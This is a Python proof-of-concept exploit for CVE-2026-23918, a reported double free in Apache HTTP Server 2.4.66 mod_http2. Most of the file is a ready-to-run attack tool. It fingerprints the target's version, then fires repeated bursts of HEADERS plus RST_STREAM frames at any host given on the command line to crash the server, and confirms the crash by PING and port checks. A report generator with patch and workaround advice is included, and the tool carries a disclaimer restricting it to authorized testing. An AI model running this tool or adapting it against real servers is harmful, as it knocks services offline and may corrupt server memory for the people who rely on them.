#!/usr/bin/env python3 """ CVE-2026-23918 PoC - Apache HTTP Server mod_http2 Double Free (Early Reset) =========================================================================== VULNERABILITY: Double Free in Apache HTTP Server 2.4.66 when mod_http2 handles early RST_STREAM frames. The bug is in h2_mplx.c where `m_stream_cleanup()` can add a stream to `m->spurge` array twice when an RST_STREAM arrives before the worker thread starts processing. AFFECTED: Apache HTTP Server 2.4.66 with mod_http2 + Event MPM FIXED IN: 2.4.67 (mod_h2 v2.0.37: "Prevent double purge of a stream") CVSS 3.1: 8.8 (HIGH) - Unauthenticated Remote Code Execution possible CWE: CWE-415 (Double Free) SVN FIXES: r1930444, r1930796 TRIGGER: Client sends HEADERS frame followed IMMEDIATELY by RST_STREAM on the same stream ID. If the timing hits the window where the stream is registered but processing hasn't started, `m_stream_cleanup()` adds the stream to `m->spurge` (the purge array). Without the deduplication check (`add_for_purge()` added in v2.0.37), the same stream can be added again during mplx/connection cleanup → double pool destruction → double free → heap corruption. DISCLAIMER: For authorized security testing and research only. This tool requires explicit permission to test against any target. """ from __future__ import annotations import argparse import json import os import socket import ssl import struct import sys import textwrap import time from dataclasses import dataclass from enum import Enum from typing import Optional, List, Tuple # Use hpack for proper HPACK encoding try: from hpack import Encoder as HpackEncoder HAS_HPACK = True except ImportError: HAS_HPACK = False # Use requests for HTTP/1.1 version probing try: import requests HAS_REQUESTS = True except ImportError: HAS_REQUESTS = False # ─── Constants ─────────────────────────────────────────────────────── H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n" # Frame types (RFC 7540 §4.1) FRAME_DATA = 0x0 FRAME_HEADERS = 0x1 FRAME_PRIORITY = 0x2 FRAME_RST_STREAM = 0x3 FRAME_SETTINGS = 0x4 FRAME_PUSH_PROMISE = 0x5 FRAME_PING = 0x6 FRAME_GOAWAY = 0x7 FRAME_WINDOW_UPDATE = 0x8 FRAME_CONTINUATION = 0x9 # Frame flags FLAG_ACK = 0x1 FLAG_END_STREAM = 0x1 FLAG_END_HEADERS = 0x4 # RST_STREAM error codes ERR_NO_ERROR = 0x0 ERR_PROTOCOL_ERROR = 0x1 ERR_INTERNAL_ERROR = 0x2 ERR_CANCEL = 0x8 ERR_REFUSED_STREAM = 0x7 # ─── Frame Builder ─────────────────────────────────────────────────── @dataclass class Frame: """HTTP/2 frame representation.""" type_: int flags: int stream_id: int payload: bytes = b"" def serialize(self) -> bytes: """Serialize frame to wire format: 9-byte header + payload.""" length = len(self.payload) header = ( struct.pack("!I", length)[1:] # 3 bytes: length (big-endian 24-bit) + bytes([self.type_]) # 1 byte: type + bytes([self.flags]) # 1 byte: flags + struct.pack("!I", self.stream_id & 0x7FFFFFFF) # 4 bytes: stream ID ) return header + self.payload def build_settings_frame(ack: bool = False) -> Frame: return Frame( type_=FRAME_SETTINGS, flags=FLAG_ACK if ack else 0, stream_id=0, payload=b"", ) def build_headers_frame(stream_id: int, headers: List[Tuple[str, str]], end_stream: bool = False, end_headers: bool = True, encoder: Optional[HpackEncoder] = None) -> Frame: """Build HEADERS frame with proper HPACK encoding.""" if encoder is None: encoder = HpackEncoder() payload = encoder.encode(headers) flags = 0 if end_stream: flags |= FLAG_END_STREAM if end_headers: flags |= FLAG_END_HEADERS return Frame( type_=FRAME_HEADERS, flags=flags, stream_id=stream_id, payload=payload, ) def build_rst_stream_frame(stream_id: int, error_code: int = ERR_CANCEL) -> Frame: return Frame( type_=FRAME_RST_STREAM, flags=0, stream_id=stream_id, payload=struct.pack("!I", error_code), ) def build_window_update(stream_id: int, increment: int = 65535) -> Frame: return Frame( type_=FRAME_WINDOW_UPDATE, flags=0, stream_id=stream_id, payload=struct.pack("!I", increment & 0x7FFFFFFF), ) def build_ping_frame(data: bytes = b"\x00" * 8, ack: bool = False) -> Frame: return Frame( type_=FRAME_PING, flags=FLAG_ACK if ack else 0, stream_id=0, payload=data, ) def build_goaway_frame(last_stream_id: int = 0, error_code: int = ERR_NO_ERROR) -> Frame: return Frame( type_=FRAME_GOAWAY, flags=0, stream_id=0, payload=struct.pack("!II", last_stream_id & 0x7FFFFFFF, error_code), ) # ─── Raw H2 Connection ─────────────────────────────────────────────── class H2Connection: """ Low-level HTTP/2 connection handler. Uses raw frame construction for precise control over frame ordering and timing - essential for race condition exploitation. """ def __init__(self, host: str, port: int, use_tls: bool = True, timeout: float = 10.0): self.host = host self.port = port self.use_tls = use_tls self.timeout = timeout self.sock: Optional[socket.socket] = None self._encoder = HpackEncoder() if HAS_HPACK else None self._headers = [ (":method", "GET"), (":path", "/"), (":scheme", "https"), (":authority", host), ] self._next_stream_id = 1 # ── Connection management ────────────────────────────────────── def connect(self) -> bool: """Establish TCP + TLS connection with ALPN h2 negotiation.""" try: self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) self.sock.connect((self.host, self.port)) if self.use_tls: ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.set_alpn_protocols(["h2"]) ctx.minimum_version = ssl.TLSVersion.TLSv1_2 self.sock = ctx.wrap_socket(self.sock, server_hostname=self.host) negotiated = self.sock.selected_alpn_protocol() if negotiated != "h2": raise RuntimeError( f"ALPN negotiation failed: got '{negotiated}'") return self._handshake() except Exception as e: return False def _handshake(self) -> bool: """Send preface + SETTINGS, await server SETTINGS, ACK.""" try: # Connection preface self._send_raw(H2_PREFACE) # Client SETTINGS (empty) self._send_frame(build_settings_frame(ack=False)) # Read server SETTINGS self.sock.settimeout(5.0) frame = self._recv_frame() self.sock.settimeout(self.timeout) if frame is None: return False # Expect SETTINGS from server if frame.type_ == FRAME_SETTINGS: if not (frame.flags & FLAG_ACK): # ACK server settings self._send_frame(build_settings_frame(ack=True)) # Drain any WINDOW_UPDATE on stream 0 self._drain() return True elif frame.type_ == FRAME_GOAWAY: return False return True except Exception: return False # ── Frame I/O ───────────────────────────────────────────────── def _send_frame(self, frame: Frame) -> bool: """Send a single HTTP/2 frame.""" try: self.sock.sendall(frame.serialize()) return True except Exception: return False def _send_raw(self, data: bytes) -> bool: """Send raw bytes.""" try: self.sock.sendall(data) return True except Exception: return False def _recv_exact(self, n: int) -> Optional[bytes]: """Receive exactly n bytes or None on failure.""" try: buf = b"" while len(buf) < n: chunk = self.sock.recv(n - len(buf)) if not chunk: return None buf += chunk return buf except Exception: return None def _recv_frame(self) -> Optional[Frame]: """Receive a single HTTP/2 frame.""" hdr = self._recv_exact(9) if hdr is None: return None length = int.from_bytes(hdr[:3], "big") frame_type = hdr[3] flags = hdr[4] stream_id = struct.unpack("!I", hdr[5:9])[0] & 0x7FFFFFFF payload = b"" if length > 0: payload = self._recv_exact(length) if payload is None: return None return Frame(type_=frame_type, flags=flags, stream_id=stream_id, payload=payload) def _drain(self, timeout: float = 0.3): """Drain socket buffer.""" try: self.sock.settimeout(timeout) while True: chunk = self.sock.recv(65536) if not chunk: break except socket.timeout: pass except Exception: pass finally: self.sock.settimeout(self.timeout) # ── Exploit operations ──────────────────────────────────────── def send_exploit_stream(self, stream_id: int) -> bool: """ Send HEADERS frame immediately followed by RST_STREAM. Combined into one send() call to maximize chance of them arriving in the same TCP segment / processing window. """ hdr = build_headers_frame( stream_id, self._headers, end_stream=False, encoder=self._encoder, ) rst = build_rst_stream_frame(stream_id, ERR_CANCEL) return self._send_raw(hdr.serialize() + rst.serialize()) def send_exploit_burst(self, count: int, start_stream_id: int = 1) -> int: """ Send a burst of HEADERS+RST_STREAM pairs. Pre-serializes all frames for maximum throughput. Returns number of pairs successfully sent. """ # Pre-build all frame pairs payloads = [] for i in range(count): sid = start_stream_id + (i * 2) hdr = build_headers_frame( sid, self._headers, end_stream=False, encoder=self._encoder, ) rst = build_rst_stream_frame(sid, ERR_CANCEL) payloads.append(hdr.serialize() + rst.serialize()) # Fire all bursts as fast as possible sent = 0 for payload in payloads: if not self._send_raw(payload): break sent += 1 # Keep connection flow control window open wu = build_window_update(0, 65535 * count) self._send_frame(wu) return sent def send_raw_exploit_burst(self, count: int, start_stream_id: int = 1) -> int: """ Alternative burst: send HEADERS to many streams first, THEN send RST_STREAM to all of them. This changes the timing profile and may be more effective at hitting the race window. """ streams = list(range(start_stream_id, start_stream_id + count * 2, 2)) sent = 0 # Phase 1: Open many streams for sid in streams: hdr = build_headers_frame( sid, self._headers, end_stream=False, encoder=self._encoder, ) if not self._send_frame(hdr): return sent sent += 1 # Phase 2: Reset all streams immediately for sid in streams: rst = build_rst_stream_frame(sid, ERR_CANCEL) self._send_frame(rst) return sent def ping(self) -> bool: """Send PING and check for PING ACK (health check).""" pdata = os.urandom(8) frame = build_ping_frame(pdata, ack=False) if not self._send_frame(frame): return False try: self.sock.settimeout(3.0) resp = self._recv_frame() self.sock.settimeout(self.timeout) if resp and resp.type_ == FRAME_PING and (resp.flags & FLAG_ACK): return resp.payload == pdata except Exception: self.sock.settimeout(self.timeout) return False def close(self): """Graceful connection close.""" if self.sock: try: self._send_frame(build_goaway_frame()) except Exception: pass try: self.sock.close() except Exception: pass # ─── Port Health Check ─────────────────────────────────────────────── def port_alive(host: str, port: int, timeout: float = 3.0) -> bool: """Test if TCP port accepts connections.""" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((host, port)) s.close() return True except Exception: return False # ─── Version Detection ─────────────────────────────────────────────── def detect_version(host: str, port: int, use_tls: bool = True, timeout: float = 5.0) -> dict: """Detect Apache version via HTTP/1.1 request.""" info = {"version": "unknown", "server": "unknown", "http2_support": False} if not HAS_REQUESTS: return info scheme = "https" if use_tls else "http" try: r = requests.get( f"{scheme}://{host}:{port}/", timeout=timeout, verify=False, headers={"User-Agent": "Mozilla/5.0"}, ) info["server"] = r.headers.get("Server", "unknown") import re m = re.search(r"Apache/([\d.]+)", info["server"]) if m: info["version"] = m.group(1) # Check for HTTP/2 via upgrade header in response # (not 100% reliable for direct h2, but indicates awareness) if "h2" in r.headers.get("Upgrade", ""): info["http2_support"] = True except Exception: pass # Try ALPN to detect h2 support if use_tls: try: ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.set_alpn_protocols(["h2", "http/1.1"]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((host, port)) ss = ctx.wrap_socket(s, server_hostname=host) negotiated = ss.selected_alpn_protocol() ss.close() if negotiated == "h2": info["http2_support"] = True except Exception: pass return info # ─── Main Exploit Class ────────────────────────────────────────────── class CVE202623918: """ CVE-2026-23918 Exploit for Apache HTTP Server mod_http2 Double Free. ROOT CAUSE: In Apache 2.4.66 (mod_h2 v2.0.33-v2.0.36), when an RST_STREAM arrives before the stream's request is picked up by a worker thread (Event MPM), h2_mplx.c:m_stream_cleanup() adds the stream to m->spurge (the purge array). Since there was no deduplication check, the same stream could be pushed again during connection/mplx teardown. In v2.0.37, add_for_purge() was added to check if the stream is already scheduled for purging, preventing the double free. The v2.0.36 quick fix reverted streams' own memory allocators (from v2.0.33), which masked the issue because APR pool cleanup functions are idempotent when pools share allocators. But the root cause (double push to spurge) remained until v2.0.37. EXPLOIT MECHANICS: 1. Establish HTTP/2 connection (TLS + ALPN h2) 2. Send HEADERS frame to open a new stream 3. Immediately send RST_STREAM (CANCEL) on same stream 4. Repeat rapidly across many streams 5. Race condition: if RST_STREAM arrives during the narrow window between stream registration and worker pickup, dual code paths may both add the stream to the purge array 6. When the mplx is destroyed, the stream pool is freed twice → double free → glibc heap corruption → SIGABRT/SIGSEGV """ def __init__(self, target: str, port: int = 443, use_tls: bool = True, timeout: float = 10.0, verbose: bool = False): self.target = target self.port = port self.use_tls = use_tls self.timeout = timeout self.verbose = verbose self._crashed = False def _log(self, msg: str, tag: str = "*"): tags = {"*": "[*]", "+": "[+]", "-": "[-]", "!": "[!]"} prefix = tags.get(tag, "[*]") ts = time.strftime("%H:%M:%S") print(f"{prefix} [{ts}] {msg}") def check(self) -> dict: """Pre-exploit reconnaissance.""" info = detect_version(self.target, self.port, self.use_tls, self.timeout) vulnerable = False reason = "Unknown" if info["version"] == "2.4.66": if info["http2_support"]: vulnerable = True reason = "Apache 2.4.66 with HTTP/2 support - VULNERABLE" else: reason = "Apache 2.4.66 but HTTP/2 not detected - may need h2 ALPN" elif info["version"] and info["version"] < "2.4.66": reason = f"Apache {info['version']} < 2.4.66 - not affected" elif info["version"] and info["version"] >= "2.4.67": reason = f"Apache {info['version']} >= 2.4.67 - likely patched" elif info["version"] == "unknown": reason = "Version unknown - proceed with caution" return { "version": info["version"], "server": info["server"], "http2_support": info["http2_support"], "vulnerable": vulnerable, "reason": reason, } def _run_burst(self, burst_size: int, conn_id: int = 0, mode: str = "inline") -> Tuple[int, bool]: """ Single connection exploit burst. Returns (streams_sent, crashed). """ conn = H2Connection( self.target, self.port, use_tls=self.use_tls, timeout=self.timeout, ) if not conn.connect(): self._log(f"Conn#{conn_id}: Connection failed", "-") return 0, False if mode == "inline": # Both frames in one send() call sent = conn.send_exploit_burst(burst_size) elif mode == "staged": # Open all, then reset all sent = conn.send_raw_exploit_burst(burst_size) else: sent = 0 self._log( f"Conn#{conn_id}: Sent {sent}/{burst_size} HEADERS+RST pairs", "+" if sent > 0 else "-", ) crashed = False if sent > 0: alive = conn.ping() if not alive: crashed = True self._log(f"Conn#{conn_id}: PING failed - server likely crashed!", "+") else: self._log(f"Conn#{conn_id}: Server alive (PING OK)", tag="*" if self.verbose else "") conn.close() return sent, crashed def execute(self, iterations: int = 10, burst_size: int = 200, delay: float = 0.3, mode: str = "inline") -> dict: """ Execute the full exploit. Args: iterations: Number of exploit rounds burst_size: HEADERS+RST_STREAM pairs per round delay: Seconds between rounds mode: 'inline' (HEADERS+RST in one send) or 'staged' (all headers then all RSTs) """ # Pre-check check = self.check() self._log(f"Target: {self.target}:{self.port}") self._log(f"Version: {check['version']} | Server: {check['server']}") self._log(f"HTTP/2: {'Yes' if check['http2_support'] else 'No/Unknown'}") self._log(f"Assessment: {check['reason']}") print() total_sent = 0 crashes = 0 round_log = [] for i in range(iterations): if self._crashed: self._log("Crash already confirmed - stopping further iterations", "!") break # Pre-iteration health check if i > 0 and not port_alive(self.target, self.port, 2.0): self._log("Port is DOWN - crash CONFIRMED!", "+") crashes += 1 self._crashed = True break self._log(f"Round {i+1}/{iterations} [{mode} mode, burst={burst_size}]") sent, crashed = self._run_burst(burst_size, conn_id=i, mode=mode) total_sent += sent if crashed: crashes += 1 self._crashed = True round_log.append({ "round": i + 1, "streams_sent": sent, "crashed": crashed, }) if not self._crashed and i < iterations - 1: time.sleep(delay) # Phase 2: Try the alternative mode if first didn't crash if not self._crashed and mode == "inline": self._log("Phase 2: Trying staged mode (burst first, then reset)...") for i in range(iterations // 2): if self._crashed: break if i > 0 and not port_alive(self.target, self.port, 2.0): self._crashed = True crashes += 1 break self._log(f" Staged round {i+1}/{iterations//2}") sent, crashed = self._run_burst(burst_size, conn_id=100 + i, mode="staged") total_sent += sent if crashed: crashes += 1 self._crashed = True if not self._crashed: time.sleep(delay) elif not self._crashed and mode == "staged": self._log("Phase 2: Trying inline mode (HEADERS+RST in one send)...") for i in range(iterations // 2): if self._crashed: break if i > 0 and not port_alive(self.target, self.port, 2.0): self._crashed = True crashes += 1 break self._log(f" Inline round {i+1}/{iterations//2}") sent, crashed = self._run_burst(burst_size, conn_id=200 + i, mode="inline") total_sent += sent if crashed: crashes += 1 self._crashed = True if not self._crashed: time.sleep(delay) # Final health check final_alive = port_alive(self.target, self.port, 3.0) result = { "target": f"{self.target}:{self.port}", "version": check["version"], "server": check["server"], "http2_support": check["http2_support"], "vulnerable": check["vulnerable"], "iterations": iterations, "burst_size": burst_size, "mode": mode, "total_streams_sent": total_sent, "crashes": crashes, "crash_confirmed": self._crashed, "port_alive": final_alive, "rounds": round_log, } # Summary print() self._log("=" * 60) if self._crashed: self._log("CRASH CONFIRMED - Target is VULNERABLE to CVE-2026-23918", "+") else: self._log("No crash detected", "-") self._log("Possible reasons:", "!") self._log(" - Target is not Apache 2.4.66", "!") self._log(" - HTTP/2 not enabled (mod_http2)", "!") self._log(" - Event MPM not in use", "!") self._log(" - Target already patched (2.4.67+)", "!") self._log(" - Need more iterations or larger burst", "!") self._log(f"Total streams sent: {total_sent}") self._log(f"Port status: {'ALIVE' if final_alive else 'DEAD/UNREACHABLE'}") self._log("=" * 60) return result # ─── Report Generator ──────────────────────────────────────────────── def generate_report(result: dict, filepath: str): """Generate detailed Markdown exploit report.""" r = result lines = [ f"# CVE-2026-23918 Exploit Report", f"", f"| Field | Value |", f"|-------|-------|", f"| **Target** | `{r['target']}` |", f"| **Date** | {time.strftime('%Y-%m-%d %H:%M:%S')} |", f"| **Apache Version** | {r['version']} |", f"| **Server Header** | `{r['server']}` |", f"| **HTTP/2 Support** | {'Yes' if r['http2_support'] else 'No/Unknown'} |", f"| **Pre-assessed** | {'Vulnerable' if r['vulnerable'] else 'Unknown/Not'} |", f"", f"## Exploit Parameters", f"", f"| Parameter | Value |", f"|-----------|-------|", f"| Iterations | {r['iterations']} |", f"| Burst size | {r['burst_size']} |", f"| Attack mode | {r['mode']} |", f"| Total streams sent | {r['total_streams_sent']} |", f"| Crashes detected | {r['crashes']} |", f"| Crash confirmed | **{'YES' if r['crash_confirmed'] else 'NO'}** |", f"| Port alive (final) | {'Yes' if r['port_alive'] else 'No'} |", f"", f"## Technical Background", f"", f"CVE-2026-23918 is a **double-free vulnerability** (CWE-415) in ", f"Apache HTTP Server's `mod_http2` module.", f"", f"### Affected Code Path", f"", f"The bug resides in `modules/http2/h2_mplx.c`:", f"", f"```c", f"static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)", f"{{", f" // ... various checks ...", f"", f" // Case: stream was submitted but not yet started", f" // (early RST_STREAM before worker picked it up)", f" else {{", f" /* never started */", f" APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream; // FIRST PUSH", f" }}", f"}}", f"```", f"", f"Later, during `h2_mplx_destroy()` or connection cleanup, ", f"another code path may also push the same stream to `m->spurge`:", f"", f"```c", f"static void c1c2_stream_joined(h2_mplx *m, h2_stream *stream)", f"{{", f" // ... ", f" APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream; // SECOND PUSH!", f"}}", f"```", f"", f"Without deduplication, both pushes reference the same stream pool.", f"When `h2_mplx_destroy()` iterates `m->spurge`, it destroys the ", f"pool **twice** → double free → heap corruption.", f"", f"### The Fix (mod_h2 v2.0.37 / Apache 2.4.67)", f"", f"```c", f"static int add_for_purge(h2_mplx *m, h2_stream *stream)", f"{{", f" int i;", f" for (i = 0; i < m->spurge->nelts; ++i) {{", f" h2_stream *s = APR_ARRAY_IDX(m->spurge, i, h2_stream*);", f" if (s == stream) /* already scheduled for purging */", f" return FALSE;", f" }}", f" APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;", f" return TRUE;", f"}}", f"```", ] if r["crash_confirmed"]: lines.extend([ f"", f"## Conclusion", f"", f"**The target IS VULNERABLE to CVE-2026-23918.**", f"", f"### Recommended Actions", f"", f"1. **Immediate:** Upgrade Apache HTTP Server to **2.4.67+**", f"2. **Workaround:** Remove `h2` from the `Protocols` directive in httpd.conf", f"3. **Alternative:** Apply the mod_h2 v2.0.37 backport (cPanel EA-13319)", f"4. **Detection:** Monitor for repeated Apache child process crashes", f" in error.log with mod_http2 stack traces", ]) else: lines.extend([ f"", f"## Conclusion", f"", f"Crash was NOT confirmed in this test run.", f"", f"### Possible Reasons:", f"- Target is not Apache 2.4.66 or already patched to 2.4.67+", f"- mod_http2 not loaded or HTTP/2 disabled via configuration", f"- Event MPM not in use (race condition requires thread/process scheduling gap)", f"- Network conditions prevented hitting the race window", f"", f"### Suggestions:", f"- Increase iterations (`-n 50`) and burst size (`-b 1000`)", f"- Try both `--mode inline` and `--mode staged`", f"- Verify the target with `curl --http2 -k https://target/`", ]) with open(filepath, "w", encoding="utf-8") as f: f.write("\n".join(lines)) # ─── CLI ───────────────────────────────────────────────────────────── def main(): parser = argparse.ArgumentParser( description="CVE-2026-23918 PoC - Apache HTTP/2 Double Free", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent("""\ Examples: %(prog)s -t 192.168.1.100 -p 443 %(prog)s -t example.com -p 443 -n 20 -b 500 %(prog)s -t example.com --mode staged -n 10 %(prog)s -t 10.0.0.1 --no-tls -p 80 %(prog)s -t target.com --check-only %(prog)s -t target.com -o results.json --report exploit_report.md """), ) parser.add_argument("-t", "--target", required=True, help="Target hostname or IP address") parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)") parser.add_argument("--no-tls", action="store_true", help="Use cleartext h2c instead of TLS h2") parser.add_argument("-n", "--iterations", type=int, default=10, help="Number of exploit iterations (default: 10)") parser.add_argument("-b", "--burst", type=int, default=200, help="HEADERS+RST pairs per iteration (default: 200)") parser.add_argument("-d", "--delay", type=float, default=0.3, help="Delay between iterations in seconds (default: 0.3)") parser.add_argument("-m", "--mode", choices=["inline", "staged"], default="inline", help="Attack mode: inline (default) sends HEADERS+RST together; " "staged opens all streams then resets all") parser.add_argument("--timeout", type=float, default=10.0, help="Connection timeout (default: 10)") parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") parser.add_argument("--check-only", action="store_true", help="Only check version, don't exploit") parser.add_argument("-o", "--output", help="Save results to JSON file") parser.add_argument("--report", help="Generate detailed markdown report to file") args = parser.parse_args() use_tls = not args.no_tls if args.port == 80: use_tls = False if not HAS_REQUESTS: print("[!] 'requests' library not available - version detection limited") print("[!] Install: pip install requests") if not HAS_HPACK: print("[!] 'hpack' library not available - HPACK encoding may fail") print("[!] Install: pip install hpack") exploit = CVE202623918( target=args.target, port=args.port, use_tls=use_tls, timeout=args.timeout, verbose=args.verbose, ) if args.check_only: info = exploit.check() print(f"\n Target: {args.target}:{args.port}") print(f" Version: {info['version']}") print(f" Server: {info['server']}") print(f" HTTP/2: {'Yes' if info['http2_support'] else 'No/Unknown'}") print(f" Status: {'VULNERABLE' if info['vulnerable'] else 'NOT VULNERABLE / UNKNOWN'}") print(f" Reason: {info['reason']}") return 0 if not info["vulnerable"] else 1 result = exploit.execute( iterations=args.iterations, burst_size=args.burst, delay=args.delay, mode=args.mode, ) if args.output: with open(args.output, "w", encoding="utf-8") as f: json.dump(result, f, indent=2, default=str) print(f"\n[+] JSON results saved to {args.output}") if args.report: generate_report(result, args.report) print(f"[+] Markdown report saved to {args.report}") return 0 if not result["crash_confirmed"] else 1 if __name__ == "__main__": sys.exit(main())